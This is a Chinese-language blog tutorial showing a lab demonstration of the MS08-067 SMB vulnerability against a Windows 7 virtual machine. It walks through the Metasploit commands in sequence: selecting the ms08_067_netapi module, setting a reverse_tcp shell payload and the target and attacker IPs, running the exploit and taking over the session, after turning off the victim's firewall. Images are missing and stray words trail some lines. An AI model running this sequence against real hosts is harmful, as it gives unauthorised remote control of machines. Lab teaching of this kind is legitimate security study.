網絡安全工程師演示:***是如何利用ms08-067漏洞進行計算機***的?

課前聲明:
一、本分享僅作學習交流,請自覺遵照法律法規!
二、搜索:Kali 與編程,學習更多網絡***乾貨!
三、Kali 與編程天天準時更新,敬請學習和關注!
正文部分
1、背景介紹
Metasploit就是一個漏洞框架。它的全稱叫作The Metasploit Framework,簡稱叫作MSF。Metasploit做爲全球最受歡迎的工具,不單單是由於它的方便性和強大性,更重要的是它的框架。它容許使用者開發本身的漏洞腳本,從而進行測試。Metasploit(msf)究竟威力如何呢?如何利用***控制受害者主機呢?接下來讓咱們一塊兒學習!
2、資源裝備
1.安裝好 Win7的虛擬機一臺
2.整裝待發的小白一個。
3.安裝好的Kali Linux虛擬機一臺。
3、戰略安排
3.1 在微軟官網查看微軟發佈的關於Windows系統的相關漏洞信息,以下圖所示,這裏咱們重點介紹一下MS08-067漏洞。
在這裏插入圖片描述
在這裏插入圖片描述shell

3.2 在受害者Windows主機中關閉相應的防火牆以及對應的安全衛士,以下圖所示。
步驟:關閉防火牆
命令:Windows鍵+R/輸入cmd/進入dos界面/
命令:firewall.cpl
步驟:關閉防火牆。
在這裏插入圖片描述編程

3.3 查看受害者主機以及***者主機的IP地址,以下圖所示。
命令:ipconfig
在這裏插入圖片描述windows

命令:ifconfig
在這裏插入圖片描述api

3.4 進入Metasploit(msf)***框架,以下圖所示。
命令:msfconsole
在這裏插入圖片描述安全

步驟1:檢索關於MS08-067的漏洞利用模塊,以下圖所示。
命令:search ms08-067
在這裏插入圖片描述網絡

步驟2:使用對應的漏洞利用模塊,以下圖所示。
命令:use exploit/windows/smb/ms08_067_netapi
在這裏插入圖片描述session

步驟3:設置漏洞對應的***參數,以下圖所示。
命令:show options(查看有哪些須要設置的***參數)
在這裏插入圖片描述框架

命令:set payload windows/shell/reverse_tcp
在這裏插入圖片描述tcp

命令:set rhosts 192.168.126.159(受害者主機)
在這裏插入圖片描述ide

命令:set lhost 192.168.126.186(***者主機)
命令:show target(查看能夠***的系統列表)

在這裏插入圖片描述
命令:set target 34

在這裏插入圖片描述
步驟4:查看參數是否配置成功,以下圖所示。
命令:show options

步驟5:執行漏洞利用模塊,以下圖所示。
命令:exploit
在這裏插入圖片描述

3.5 ***成功,成功拿下目標主機,以下圖所示。
在這裏插入圖片描述

步驟1:查看當前的會話鏈接,以下圖所示。
命令:sessions -l
在這裏插入圖片描述

步驟2:切換會話,以下圖所示。
命令:sessions -i 2
在這裏插入圖片描述
小編一個個字敲打創做,可辛苦了,問君能否關注一下我呢?你還可搜索:Kali與編程,學習更多******技巧呢 !拒絕盜版,轉載請聲明來源:Kali與編程
點我學習更多Kali Linux***測試與網絡***實戰技巧!

相關文章
相關標籤/搜索